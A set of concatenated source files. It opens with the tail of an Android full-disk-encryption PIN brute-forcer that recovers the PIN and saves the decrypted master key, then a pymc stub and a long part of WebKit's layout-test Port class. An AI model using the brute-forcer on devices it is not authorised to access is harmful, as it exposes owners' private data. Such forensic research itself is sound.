if decData[16:32] == "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0":
return passwdTry, decrypted_key, decData
return None
def do_job(header_file, encrypted_partition, outfile, maxpin_digits):
assert path.isfile(header_file), "Header file '%s' not found." % header_file
assert path.isfile(encrypted_partition), "Encrypted partition '%s' not found." % encrypted_partition
# Parse header
encrypted_key, salt = parse_header(header_file)
for n in xrange(4, maxpin_digits+1):
result = bruteforce_pin(encrypted_partition, encrypted_key, salt, n)
if result:
passwdTry, decrypted_key, decData = result
print "Decrypted data:"
hexdump(decData)
print 'Found PIN!: ' + passwdTry
if outfile:
print "Saving decrypted master key to '%s'" % outfile
open(outfile, 'wb').write(decrypted_key)
break
print "Done."
def main():
parser = argparse.ArgumentParser(description='FDE for Android')
parser.add_argument('encrypted_partition', help='The first sector of the encrypted /data partition')
parser.add_argument('header_file', help='The header file containing the encrypted key')
parser.add_argument('-d', '--maxpin_digits', help='max PIN digits. Default is 4', default=4, type=int)
parser.add_argument('-o', '--output_keyfile', help='The filename to save the decrypted master key. Default does not save it', default=None)
args = parser.parse_args()
header_file = args.header_file
encrypted_partition = args.encrypted_partition
outfile = args.output_keyfile
maxpin_digits = args.maxpin_digits
do_job(header_file, encrypted_partition, outfile, maxpin_digits)
if __name__ == "__main__":
main()
| sogeti-esec-lab/android-fde | pydroidfde/bruteforce.py | Python | bsd-3-clause | 4,064 |
# http://matpalm.com/blog/2012/12/27/dead_simple_pymc/
from pylab import * # for close()
import spacepy.plot as spp # for the styles
import numpy as np
import pymc as pm
| balarsen/pymc_learning | Learning/simple_normal_model.py | Python | bsd-3-clause | 175 |
# Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the Google name nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Abstract base class of Port-specific entry points for the layout tests
test infrastructure (the Port and Driver classes)."""
import cgi
import difflib
import errno
import itertools
import json
import logging
import os
import operator
import optparse
import re
import sys
try:
from collections import OrderedDict
except ImportError:
# Needed for Python < 2.7
from webkitpy.thirdparty.ordered_dict import OrderedDict
from webkitpy.common import find_files
from webkitpy.common import read_checksum_from_png
from webkitpy.common.memoized import memoized
from webkitpy.common.system import path
from webkitpy.common.system.executive import ScriptError
from webkitpy.common.system.path import cygpath
from webkitpy.common.system.systemhost import SystemHost
from webkitpy.common.webkit_finder import WebKitFinder
from webkitpy.layout_tests.layout_package.bot_test_expectations import BotTestExpectationsFactory
from webkitpy.layout_tests.models import test_run_results
from webkitpy.layout_tests.models.test_configuration import TestConfiguration
from webkitpy.layout_tests.port import config as port_config
from webkitpy.layout_tests.port import driver
from webkitpy.layout_tests.port import server_process
from webkitpy.layout_tests.port.factory import PortFactory
from webkitpy.layout_tests.servers import apache_http
from webkitpy.layout_tests.servers import pywebsocket
from webkitpy.layout_tests.servers import wptserve
_log = logging.getLogger(__name__)
# FIXME: This class should merge with WebKitPort now that Chromium behaves mostly like other webkit ports.
class Port(object):
"""Abstract class for Port-specific hooks for the layout_test package."""
# Subclasses override this. This should indicate the basic implementation
# part of the port name, e.g., 'mac', 'win', 'gtk'; there is probably (?)
# one unique value per class.
# FIXME: We should probably rename this to something like 'implementation_name'.
port_name = None
# Test names resemble unix relative paths, and use '/' as a directory separator.
TEST_PATH_SEPARATOR = '/'
ALL_BUILD_TYPES = ('debug', 'release')
CONTENT_SHELL_NAME = 'content_shell'
# True if the port as aac and mp3 codecs built in.
PORT_HAS_AUDIO_CODECS_BUILT_IN = False
ALL_SYSTEMS = (
# FIXME: We treat Retina (High-DPI) devices as if they are running
# a different operating system version. This isn't accurate, but will work until
# we need to test and support baselines across multiple O/S versions.
('retina', 'x86'),
('mac10.9', 'x86'),
('mac10.10', 'x86'),
('mac10.11', 'x86'),
('win7', 'x86'),
('win10', 'x86'),
('precise', 'x86_64'),
('trusty', 'x86_64'),
# FIXME: Technically this should be 'arm', but adding a third architecture type breaks TestConfigurationConverter.
# If we need this to be 'arm' in the future, then we first have to fix TestConfigurationConverter.
('icecreamsandwich', 'x86'),
)
CONFIGURATION_SPECIFIER_MACROS = {
'mac': ['retina', 'mac10.9', 'mac10.10', 'mac10.11'],
'win': ['win7', 'win10'],
'linux': ['precise', 'trusty'],
'android': ['icecreamsandwich'],
}
DEFAULT_BUILD_DIRECTORIES = ('out',)
# overridden in subclasses.
FALLBACK_PATHS = {}
SUPPORTED_VERSIONS = []
# URL to the build requirements page.
BUILD_REQUIREMENTS_URL = ''
@classmethod
def latest_platform_fallback_path(cls):
return cls.FALLBACK_PATHS[cls.SUPPORTED_VERSIONS[-1]]
@classmethod
def _static_build_path(cls, filesystem, build_directory, chromium_base, target, comps):
if build_directory:
return filesystem.join(build_directory, target, *comps)
hits = []
for directory in cls.DEFAULT_BUILD_DIRECTORIES:
base_dir = filesystem.join(chromium_base, directory, target)
path = filesystem.join(base_dir, *comps)
if filesystem.exists(path):
hits.append((filesystem.mtime(path), path))
if hits:
hits.sort(reverse=True)
return hits[0][1] # Return the newest file found.
# We have to default to something, so pick the last one.
return filesystem.join(base_dir, *comps)
@classmethod
def determine_full_port_name(cls, host, options, port_name):
"""Return a fully-specified port name that can be used to construct objects."""
# Subclasses will usually override this.
assert port_name.startswith(cls.port_name)
return port_name
def __init__(self, host, port_name, options=None, **kwargs):
# This value may be different from cls.port_name by having version modifiers
# and other fields appended to it (for example, 'qt-arm' or 'mac-wk2').
self._name = port_name
# These are default values that should be overridden in a subclasses.
self._version = ''
self._architecture = 'x86'
# FIXME: Ideally we'd have a package-wide way to get a
# well-formed options object that had all of the necessary
# options defined on it.
self._options = options or optparse.Values()
self.host = host
self._executive = host.executive
self._filesystem = host.filesystem
self._webkit_finder = WebKitFinder(host.filesystem)
self._config = port_config.Config(self._executive, self._filesystem, self.port_name)
self._helper = None
self._http_server = None
self._websocket_server = None
self._is_wpt_enabled = hasattr(options, 'enable_wptserve') and options.enable_wptserve
self._wpt_server = None
self._image_differ = None
self._server_process_constructor = server_process.ServerProcess # overridable for testing
self._http_lock = None # FIXME: Why does this live on the port object?
self._dump_reader = None
# Python's Popen has a bug that causes any pipes opened to a
# process that can't be executed to be leaked. Since this
# code is specifically designed to tolerate exec failures
# to gracefully handle cases where wdiff is not installed,
# the bug results in a massive file descriptor leak. As a
# workaround, if an exec failure is ever experienced for
# wdiff, assume it's not available. This will leak one
# file descriptor but that's better than leaking each time
# wdiff would be run.
#
# http://mail.python.org/pipermail/python-list/
# 2008-August/505753.html
# http://bugs.python.org/issue3210
self._wdiff_available = None
# FIXME: prettypatch.py knows this path, why is it copied here?
self._pretty_patch_path = self.path_from_webkit_base("Tools", "Scripts", "webkitruby", "PrettyPatch", "prettify.rb")
self._pretty_patch_available = None
if not hasattr(options, 'configuration') or not options.configuration:
self.set_option_default('configuration', self.default_configuration())
if not hasattr(options, 'target') or not options.target:
self.set_option_default('target', self._options.configuration)
self._test_configuration = None
self._reftest_list = {}
self._results_directory = None
self._virtual_test_suites = None
def __str__(self):
return "Port{name=%s, version=%s, architecture=%s, test_configuration=%s}" % (self._name, self._version, self._architecture, self._test_configuration)
def buildbot_archives_baselines(self):
return True
def additional_driver_flag(self):
if self.driver_name() == self.CONTENT_SHELL_NAME:
return ['--run-layout-test']
return []
def supports_per_test_timeout(self):
return False
def default_pixel_tests(self):
return True
def default_smoke_test_only(self):
return False
def default_timeout_ms(self):
timeout_ms = 6 * 1000
if self.get_option('configuration') == 'Debug':
# Debug is usually 2x-3x slower than Release.
return 3 * timeout_ms
return timeout_ms
def driver_stop_timeout(self):
""" Returns the amount of time in seconds to wait before killing the process in driver.stop()."""
# We want to wait for at least 3 seconds, but if we are really slow, we want to be slow on cleanup as
# well (for things like ASAN, Valgrind, etc.)
return 3.0 * float(self.get_option('time_out_ms', '0')) / self.default_timeout_ms()
def wdiff_available(self):
if self._wdiff_available is None:
self._wdiff_available = self.check_wdiff(logging=False)
return self._wdiff_available
def pretty_patch_available(self):
if self._pretty_patch_available is None:
self._pretty_patch_available = self.check_pretty_patch(logging=False)
return self._pretty_patch_available
def default_batch_size(self):
"""Return the default batch size to use for this port."""
if self.get_option('enable_sanitizer'):
# ASAN/MSAN/TSAN use more memory than regular content_shell. Their
# memory usage may also grow over time, up to a certain point.
# Relaunching the driver periodically helps keep it under control.
return 40
# The default is infinte batch size.
return None
def default_child_processes(self):
"""Return the number of child processes to use for this port."""
return self._executive.cpu_count()
def max_drivers_per_process(self):
"""The maximum number of drivers a child process can use for this port."""
return 2
def default_max_locked_shards(self):
"""Return the number of "locked" shards to run in parallel (like the http tests)."""
max_locked_shards = int(self.default_child_processes()) / 4
if not max_locked_shards:
return 1
return max_locked_shards
def baseline_path(self):
"""Return the absolute path to the directory to store new baselines in for this port."""
# FIXME: remove once all callers are calling either baseline_version_dir() or baseline_platform_dir()
return self.baseline_version_dir()
def baseline_platform_dir(self):
"""Return the absolute path to the default (version-independent) platform-specific results."""
return self._filesystem.join(self.layout_tests_dir(), 'platform', self.port_name)
def baseline_version_dir(self):
"""Return the absolute path to the platform-and-version-specific results."""
baseline_search_paths = self.baseline_search_path()
return baseline_search_paths[0]
def virtual_baseline_search_path(self, test_name):
suite = self.lookup_virtual_suite(test_name)
if not suite:
return None
return [self._filesystem.join(path, suite.name) for path in self.default_baseline_search_path()]
def baseline_search_path(self):
return self.get_option('additional_platform_directory', []) + self._compare_baseline() + self.default_baseline_search_path()
def default_baseline_search_path(self):
"""Return a list of absolute paths to directories to search under for
baselines. The directories are searched in order."""
return map(self._webkit_baseline_path, self.FALLBACK_PATHS[self.version()])
@memoized
def _compare_baseline(self):
factory = PortFactory(self.host)
target_port = self.get_option('compare_port')
if target_port:
return factory.get(target_port).default_baseline_search_path()
return []
def _check_file_exists(self, path_to_file, file_description,
override_step=None, logging=True):
"""Verify the file is present where expected or log an error.
Args:
file_name: The (human friendly) name or description of the file
you're looking for (e.g., "HTTP Server"). Used for error logging.
override_step: An optional string to be logged if the check fails.
logging: Whether or not log the error messages."""
if not self._filesystem.exists(path_to_file):
if logging:
_log.error('Unable to find %s' % file_description)
_log.error(' at %s' % path_to_file)
if override_step:
_log.error(' %s' % override_step)
_log.error('')
return False
return True
def check_build(self, needs_http, printer):
result = True
dump_render_tree_binary_path = self._path_to_driver()
result = self._check_file_exists(dump_render_tree_binary_path,
'test driver') and result
if not result and self.get_option('build'):
result = self._check_driver_build_up_to_date(
self.get_option('configuration'))
else:
_log.error('')
helper_path = self._path_to_helper()
if helper_path:
result = self._check_file_exists(helper_path,
'layout test helper') and result
if self.get_option('pixel_tests'):
result = self.check_image_diff(
'To override, invoke with --no-pixel-tests') and result
# It's okay if pretty patch and wdiff aren't available, but we will at least log messages.
self._pretty_patch_available = self.check_pretty_patch()
self._wdiff_available = self.check_wdiff()
if self._dump_reader:
result = self._dump_reader.check_is_functional() and result
if needs_http:
result = self.check_httpd() and result
return test_run_results.OK_EXIT_STATUS if result else test_run_results.UNEXPECTED_ERROR_EXIT_STATUS
def _check_driver(self):
driver_path = self._path_to_driver()
if not self._filesystem.exists(driver_path):
_log.error("%s was not found at %s" % (self.driver_name(), driver_path))
return False
return True
def _check_port_build(self):
# Ports can override this method to do additional checks.
return True
def check_sys_deps(self, needs_http):
"""If the port needs to do some runtime checks to ensure that the
tests can be run successfully, it should override this routine.
This step can be skipped with --nocheck-sys-deps.
Returns whether the system is properly configured."""
cmd = [self._path_to_driver(), '--check-layout-test-sys-deps']
local_error = ScriptError()
def error_handler(script_error):
local_error.exit_code = script_error.exit_code
output = self._executive.run_command(cmd, error_handler=error_handler)
if local_error.exit_code:
_log.error('System dependencies check failed.')
_log.error('To override, invoke with --nocheck-sys-deps')
_log.error('')
_log.error(output)
if self.BUILD_REQUIREMENTS_URL is not '':
_log.error('')
_log.error('For complete build requirements, please see:')
_log.error(self.BUILD_REQUIREMENTS_URL)
return test_run_results.SYS_DEPS_EXIT_STATUS
return test_run_results.OK_EXIT_STATUS
def check_image_diff(self, override_step=None, logging=True):
"""This routine is used to check whether image_diff binary exists."""
image_diff_path = self._path_to_image_diff()
if not self._filesystem.exists(image_diff_path):
_log.error("image_diff was not found at %s" % image_diff_path)
return False
return True
def check_pretty_patch(self, logging=True):
"""Checks whether we can use the PrettyPatch ruby script."""
try:
_ = self._executive.run_command(['ruby', '--version'])
except OSError, e:
if e.errno in [errno.ENOENT, errno.EACCES, errno.ECHILD]:
if logging:
_log.warning("Ruby is not installed; can't generate pretty patches.")
_log.warning('')
return False
if not self._filesystem.exists(self._pretty_patch_path):
if logging:
_log.warning("Unable to find %s; can't generate pretty patches." % self._pretty_patch_path)
_log.warning('')
return False
return True
def check_wdiff(self, logging=True):
if not self._path_to_wdiff():
# Don't need to log here since this is the port choosing not to use wdiff.
return False
try:
_ = self._executive.run_command([self._path_to_wdiff(), '--help'])
except OSError:
if logging:
message = self._wdiff_missing_message()
if message:
for line in message.splitlines():
_log.warning(' ' + line)
_log.warning('')
return False
return True
def _wdiff_missing_message(self):
return 'wdiff is not installed; please install it to generate word-by-word diffs.'
def check_httpd(self):
httpd_path = self.path_to_apache()
if httpd_path:
try:
server_name = self._filesystem.basename(httpd_path)
env = self.setup_environ_for_server(server_name)
if self._executive.run_command([httpd_path, "-v"], env=env, return_exit_code=True) != 0:
_log.error("httpd seems broken. Cannot run http tests.")
return False
return True
except OSError:
pass
_log.error("No httpd found. Cannot run http tests.")
return False
def do_text_results_differ(self, expected_text, actual_text):
return expected_text != actual_text
def do_audio_results_differ(self, expected_audio, actual_audio):
return expected_audio != actual_audio
def diff_image(self, expected_contents, actual_contents):
"""Compare two images and return a tuple of an image diff, and an error string.
If an error occurs (like image_diff isn't found, or crashes, we log an error and return True (for a diff).
"""
# If only one of them exists, return that one.
if not actual_contents and not expected_contents:
return (None, None)
if not actual_contents:
return (expected_contents, None)
if not expected_contents:
return (actual_contents, None)
tempdir = self._filesystem.mkdtemp()
expected_filename = self._filesystem.join(str(tempdir), "expected.png")
self._filesystem.write_binary_file(expected_filename, expected_contents)
actual_filename = self._filesystem.join(str(tempdir), "actual.png")
self._filesystem.write_binary_file(actual_filename, actual_contents)
diff_filename = self._filesystem.join(str(tempdir), "diff.png")
# image_diff needs native win paths as arguments, so we need to convert them if running under cygwin.
native_expected_filename = self._convert_path(expected_filename)
native_actual_filename = self._convert_path(actual_filename)
native_diff_filename = self._convert_path(diff_filename)
executable = self._path_to_image_diff()
# Note that although we are handed 'old', 'new', image_diff wants 'new', 'old'.
comand = [executable, '--diff', native_actual_filename, native_expected_filename, native_diff_filename]
result = None
err_str = None
try:
exit_code = self._executive.run_command(comand, return_exit_code=True)
if exit_code == 0:
# The images are the same.
result = None
elif exit_code == 1:
result = self._filesystem.read_binary_file(native_diff_filename)
else:
err_str = "Image diff returned an exit code of %s. See http://crbug.com/278596" % exit_code
except OSError, e:
err_str = 'error running image diff: %s' % str(e)
finally:
self._filesystem.rmtree(str(tempdir))
return (result, err_str or None)
def diff_text(self, expected_text, actual_text, expected_filename, actual_filename):
"""Returns a string containing the diff of the two text strings
in 'unified diff' format."""
# The filenames show up in the diff output, make sure they're
# raw bytes and not unicode, so that they don't trigger join()
# trying to decode the input.
def to_raw_bytes(string_value):
if isinstance(string_value, unicode):
return string_value.encode('utf-8')
return string_value
expected_filename = to_raw_bytes(expected_filename)
actual_filename = to_raw_bytes(actual_filename)
diff = difflib.unified_diff(expected_text.splitlines(True),
actual_text.splitlines(True),
expected_filename,
actual_filename)
# The diff generated by the difflib is incorrect if one of the files
# does not have a newline at the end of the file and it is present in
# the diff. Relevant Python issue: http://bugs.python.org/issue2142
def diff_fixup(diff):
for line in diff:
yield line
if not line.endswith('\n'):
yield '\n\ No newline at end of file\n'
return ''.join(diff_fixup(diff))
def driver_name(self):
if self.get_option('driver_name'):
return self.get_option('driver_name')
return self.CONTENT_SHELL_NAME
def expected_baselines_by_extension(self, test_name):
"""Returns a dict mapping baseline suffix to relative path for each baseline in
a test. For reftests, it returns ".==" or ".!=" instead of the suffix."""
# FIXME: The name similarity between this and expected_baselines() below, is unfortunate.
# We should probably rename them both.
baseline_dict = {}
reference_files = self.reference_files(test_name)
if reference_files:
# FIXME: How should this handle more than one type of reftest?
baseline_dict['.' + reference_files[0][0]] = self.relative_test_filename(reference_files[0][1])
for extension in self.baseline_extensions():
path = self.expected_filename(test_name, extension, return_default=False)
baseline_dict[extension] = self.relative_test_filename(path) if path else path
return baseline_dict
def baseline_extensions(self):
"""Returns a tuple of all of the non-reftest baseline extensions we use. The extensions include the leading '.'."""
return ('.wav', '.txt', '.png')
def expected_baselines(self, test_name, suffix, all_baselines=False):
"""Given a test name, finds where the baseline results are located.
Args:
test_name: name of test file (usually a relative path under LayoutTests/)
suffix: file suffix of the expected results, including dot; e.g.
'.txt' or '.png'. This should not be None, but may be an empty
string.
all_baselines: If True, return an ordered list of all baseline paths
for the given platform. If False, return only the first one.
Returns
a list of ( platform_dir, results_filename ), where
platform_dir - abs path to the top of the results tree (or test
tree)
results_filename - relative path from top of tree to the results
file
(port.join() of the two gives you the full path to the file,
unless None was returned.)
Return values will be in the format appropriate for the current
platform (e.g., "\\" for path separators on Windows). If the results
file is not found, then None will be returned for the directory,
but the expected relative pathname will still be returned.
This routine is generic but lives here since it is used in
conjunction with the other baseline and filename routines that are
platform specific.
"""
baseline_filename = self._filesystem.splitext(test_name)[0] + '-expected' + suffix
baseline_search_path = self.baseline_search_path()
baselines = []
for platform_dir in baseline_search_path:
if self._filesystem.exists(self._filesystem.join(platform_dir, baseline_filename)):
baselines.append((platform_dir, baseline_filename))
if not all_baselines and baselines:
return baselines
# If it wasn't found in a platform directory, return the expected
# result in the test directory, even if no such file actually exists.
platform_dir = self.layout_tests_dir()
if self._filesystem.exists(self._filesystem.join(platform_dir, baseline_filename)):
baselines.append((platform_dir, baseline_filename))
if baselines:
return baselines
return [(None, baseline_filename)]
def expected_filename(self, test_name, suffix, return_default=True):
"""Given a test name, returns an absolute path to its expected results.
If no expected results are found in any of the searched directories,
the directory in which the test itself is located will be returned.
The return value is in the format appropriate for the platform
(e.g., "\\" for path separators on windows).
Args:
test_name: name of test file (usually a relative path under LayoutTests/)
suffix: file suffix of the expected results, including dot; e.g. '.txt'
or '.png'. This should not be None, but may be an empty string.
platform: the most-specific directory name to use to build the
search list of directories, e.g., 'win', or
'chromium-cg-mac-leopard' (we follow the WebKit format)
return_default: if True, returns the path to the generic expectation if nothing
else is found; if False, returns None.
This routine is generic but is implemented here to live alongside
the other baseline and filename manipulation routines.
"""
# FIXME: The [0] here is very mysterious, as is the destructured return.
platform_dir, baseline_filename = self.expected_baselines(test_name, suffix)[0]
if platform_dir:
return self._filesystem.join(platform_dir, baseline_filename)
actual_test_name = self.lookup_virtual_test_base(test_name)
if actual_test_name:
return self.expected_filename(actual_test_name, suffix)
if return_default:
return self._filesystem.join(self.layout_tests_dir(), baseline_filename)
return None
def expected_checksum(self, test_name):
"""Returns the checksum of the image we expect the test to produce, or None if it is a text-only test."""
png_path = self.expected_filename(test_name, '.png')
if self._filesystem.exists(png_path):
with self._filesystem.open_binary_file_for_reading(png_path) as filehandle:
return read_checksum_from_png.read_checksum(filehandle)
return None
def expected_image(self, test_name):
"""Returns the image we expect the test to produce."""
baseline_path = self.expected_filename(test_name, '.png')
if not self._filesystem.exists(baseline_path):
return None
return self._filesystem.read_binary_file(baseline_path)
def expected_audio(self, test_name):
baseline_path = self.expected_filename(test_name, '.wav')
if not self._filesystem.exists(baseline_path):
return None
return self._filesystem.read_binary_file(baseline_path)
def expected_text(self, test_name):
"""Returns the text output we expect the test to produce, or None
if we don't expect there to be any text output.
End-of-line characters are normalized to '\n'."""
# FIXME: DRT output is actually utf-8, but since we don't decode the
# output from DRT (instead treating it as a binary string), we read the
# baselines as a binary string, too.
baseline_path = self.expected_filename(test_name, '.txt')
if not self._filesystem.exists(baseline_path):
return None
text = self._filesystem.read_binary_file(baseline_path)
return text.replace("\r\n", "\n")
def _get_reftest_list(self, test_name):
dirname = self._filesystem.join(self.layout_tests_dir(), self._filesystem.dirname(test_name))
if dirname not in self._reftest_list:
self._reftest_list[dirname] = Port._parse_reftest_list(self._filesystem, dirname)
return self._reftest_list[dirname]
@staticmethod
def _parse_reftest_list(filesystem, test_dirpath):
reftest_list_path = filesystem.join(test_dirpath, 'reftest.list')
if not filesystem.isfile(reftest_list_path):
return None
reftest_list_file = filesystem.read_text_file(reftest_list_path)
parsed_list = {}
for line in reftest_list_file.split('\n'):
line = re.sub('#.+$', '', line)
split_line = line.split()
if len(split_line) == 4:
# FIXME: Probably one of mozilla's extensions in the reftest.list format. Do we need to support this?
_log.warning("unsupported reftest.list line '%s' in %s" % (line, reftest_list_path))
continue
if len(split_line) < 3:
continue
expectation_type, test_file, ref_file = split_line
parsed_list.setdefault(filesystem.join(test_dirpath, test_file), []).append(
(expectation_type, filesystem.join(test_dirpath, ref_file)))
return parsed_list
def reference_files(self, test_name):
"""Return a list of expectation (== or !=) and filename pairs"""
reftest_list = self._get_reftest_list(test_name)
if not reftest_list:
reftest_list = []
for expectation, prefix in (('==', ''), ('!=', '-mismatch')):
for extension in Port._supported_file_extensions:
path = self.expected_filename(test_name, prefix + extension)
if self._filesystem.exists(path):
reftest_list.append((expectation, path))
return reftest_list
return reftest_list.get(self._filesystem.join(self.layout_tests_dir(), test_name), []) # pylint: disable=E1103
def tests(self, paths):
"""Return the list of tests found matching paths."""
tests = self._real_tests(paths)
suites = self.virtual_test_suites()
if paths:
tests.extend(self._virtual_tests_matching_paths(paths, suites))
else:
tests.extend(self._all_virtual_tests(suites))
return tests
def _real_tests(self, paths):
# When collecting test cases, skip these directories
skipped_directories = set(['.svn', '_svn', 'platform', 'resources', 'support', 'script-tests', 'reference', 'reftest'])
files = find_files.find(self._filesystem, self.layout_tests_dir(), paths,
skipped_directories, Port.is_test_file, self.test_key)
return [self.relative_test_filename(f) for f in files]
# When collecting test cases, we include any file with these extensions.
_supported_file_extensions = set(['.html', '.xml', '.xhtml', '.xht', '.pl',
'.htm', '.php', '.svg', '.mht', '.pdf'])
@staticmethod
# If any changes are made here be sure to update the isUsedInReftest method in old-run-webkit-tests as well.
def is_reference_html_file(filesystem, dirname, filename):
if filename.startswith('ref-') or filename.startswith('notref-'):
return True
filename_wihout_ext, unused = filesystem.splitext(filename)
for suffix in ['-expected', '-expected-mismatch', '-ref', '-notref']:
if filename_wihout_ext.endswith(suffix):
return True
return False
@staticmethod
def _has_supported_extension(filesystem, filename):
"""Return true if filename is one of the file extensions we want to run a test on."""
extension = filesystem.splitext(filename)[1]
return extension in Port._supported_file_extensions
@staticmethod
def is_test_file(filesystem, dirname, filename):
return Port._has_supported_extension(filesystem, filename) and not Port.is_reference_html_file(filesystem, dirname, filename)
ALL_TEST_TYPES = ['audio', 'harness', 'pixel', 'ref', 'text', 'unknown']
def test_type(self, test_name):
fs = self._filesystem
if fs.exists(self.expected_filename(test_name, '.png')):
return 'pixel'
if fs.exists(self.expected_filename(test_name, '.wav')):
return 'audio'
if self.reference_files(test_name):
return 'ref'
txt = self.expected_text(test_name)
if txt:
if 'layer at (0,0) size 800x600' in txt:
return 'pixel'
for line in txt.splitlines():
if line.startswith('FAIL') or line.startswith('TIMEOUT') or line.startswith('PASS'):
return 'harness'
return 'text'
return 'unknown'
def test_key(self, test_name):
"""Turns a test name into a list with two sublists, the natural key of the
dirname, and the natural key of the basename.
This can be used when sorting paths so that files in a directory.
directory are kept together rather than being mixed in with files in
subdirectories."""
dirname, basename = self.split_test(test_name)
return (self._natural_sort_key(dirname + self.TEST_PATH_SEPARATOR), self._natural_sort_key(basename))
def _natural_sort_key(self, string_to_split):
""" Turns a string into a list of string and number chunks, i.e. "z23a" -> ["z", 23, "a"]
This can be used to implement "natural sort" order. See:
http://www.codinghorror.com/blog/2007/12/sorting-for-humans-natural-sort-order.html
http://nedbatchelder.com/blog/200712.html#e20071211T054956
"""
def tryint(val):
try:
return int(val)
except ValueError:
return val
return [tryint(chunk) for chunk in re.split('(\d+)', string_to_split)]
def test_dirs(self):
"""Returns the list of top-level test directories."""
layout_tests_dir = self.layout_tests_dir()
return filter(lambda x: self._filesystem.isdir(self._filesystem.join(layout_tests_dir, x)),
self._filesystem.listdir(layout_tests_dir))
@memoized
def test_isfile(self, test_name):
"""Return True if the test name refers to a directory of tests."""
# Used by test_expectations.py to apply rules to whole directories.
if self._filesystem.isfile(self.abspath_for_test(test_name)):
return True
base = self.lookup_virtual_test_base(test_name)
return base and self._filesystem.isfile(self.abspath_for_test(base))
@memoized
def test_isdir(self, test_name):
"""Return True if the test name refers to a directory of tests."""
# Used by test_expectations.py to apply rules to whole directories.
if self._filesystem.isdir(self.abspath_for_test(test_name)):
return True
base = self.lookup_virtual_test_base(test_name)
return base and self._filesystem.isdir(self.abspath_for_test(base))
@memoized
def test_exists(self, test_name):
"""Return True if the test name refers to an existing test or baseline."""
# Used by test_expectations.py to determine if an entry refers to a
# valid test and by printing.py to determine if baselines exist.
return self.test_isfile(test_name) or self.test_isdir(test_name)
def split_test(self, test_name):
"""Splits a test name into the 'directory' part and the 'basename' part."""
index = test_name.rfind(self.TEST_PATH_SEPARATOR)
if index < 1:
return ('', test_name)
return (test_name[0:index], test_name[index:])
def normalize_test_name(self, test_name):
"""Returns a normalized version of the test name or test directory."""
if test_name.endswith('/'):
return test_name
if self.test_isdir(test_name):
return test_name + '/'
return test_name
def driver_cmd_line(self):
"""Prints the DRT command line that will be used."""
driver = self.create_driver(0)
return driver.cmd_line(self.get_option('pixel_tests'), [])
def update_baseline(self, baseline_path, data):
"""Updates the baseline for a test.
Args:
baseline_path: the actual path to use for baseline, not the path to
the test. This function is used to update either generic or
platform-specific baselines, but we can't infer which here.
data: contents of the baseline.
"""
self._filesystem.write_binary_file(baseline_path, data)
# FIXME: update callers to create a finder and call it instead of these next five routines (which should be protected).
def webkit_base(self):
return self._webkit_finder.webkit_base()
def path_from_webkit_base(self, *comps):
return self._webkit_finder.path_from_webkit_base(*comps)
def path_from_chromium_base(self, *comps):
return self._webkit_finder.path_from_chromium_base(*comps)
def path_to_script(self, script_name):
return self._webkit_finder.path_to_script(script_name)
def layout_tests_dir(self):
return self._webkit_finder.layout_tests_dir()
def perf_tests_dir(self):
return self._webkit_finder.perf_tests_dir()
def skipped_layout_tests(self, test_list):
"""Returns tests skipped outside of the TestExpectations files."""
return set(self._skipped_tests_for_unsupported_features(test_list))
def _tests_from_skipped_file_contents(self, skipped_file_contents):
tests_to_skip = []
for line in skipped_file_contents.split('\n'):
line = line.strip()
line = line.rstrip('/') # Best to normalize directory names to not include the trailing slash.
if line.startswith('#') or not len(line):
continue
tests_to_skip.append(line)
return tests_to_skip
def _expectations_from_skipped_files(self, skipped_file_paths):
tests_to_skip = []
for search_path in skipped_file_paths:
filename = self._filesystem.join(self._webkit_baseline_path(search_path), "Skipped")
if not self._filesystem.exists(filename):
_log.debug("Skipped does not exist: %s" % filename)
continue
_log.debug("Using Skipped file: %s" % filename)
skipped_file_contents = self._filesystem.read_text_file(filename)
tests_to_skip.extend(self._tests_from_skipped_file_contents(skipped_file_contents))
return tests_to_skip
@memoized
def skipped_perf_tests(self):
return self._expectations_from_skipped_files([self.perf_tests_dir()])
def skips_perf_test(self, test_name):
for test_or_category in self.skipped_perf_tests():
if test_or_category == test_name:
return True
category = self._filesystem.join(self.perf_tests_dir(), test_or_category)
if self._filesystem.isdir(category) and test_name.startswith(test_or_category):
return True
return False
def is_chromium(self):
return True
def name(self):
"""Returns a name that uniquely identifies this particular type of port
(e.g., "mac-snowleopard" or "linux-trusty" and can be passed
to factory.get() to instantiate the port."""
return self._name
def operating_system(self):
# Subclasses should override this default implementation.
return 'mac'
def version(self):
"""Returns a string indicating the version of a given platform, e.g.
'leopard' or 'win7'.
This is used to help identify the exact port when parsing test
expectations, determining search paths, and logging information."""
return self._version
def architecture(self):
return self._architecture
def get_option(self, name, default_value=None):
return getattr(self._options, name, default_value)
def set_option_default(self, name, default_value):
return self._options.ensure_value(name, default_value)
@memoized
def path_to_generic_test_expectations_file(self):
return self._filesystem.join(self.layout_tests_dir(), 'TestExpectations')
def relative_test_filename(self, filename):
"""Returns a test_name a relative unix-style path for a filename under the LayoutTests
directory. Ports may legitimately return abspaths here if no relpath makes sense."""
# Ports that run on windows need to override this method to deal with
# filenames with backslashes in them.
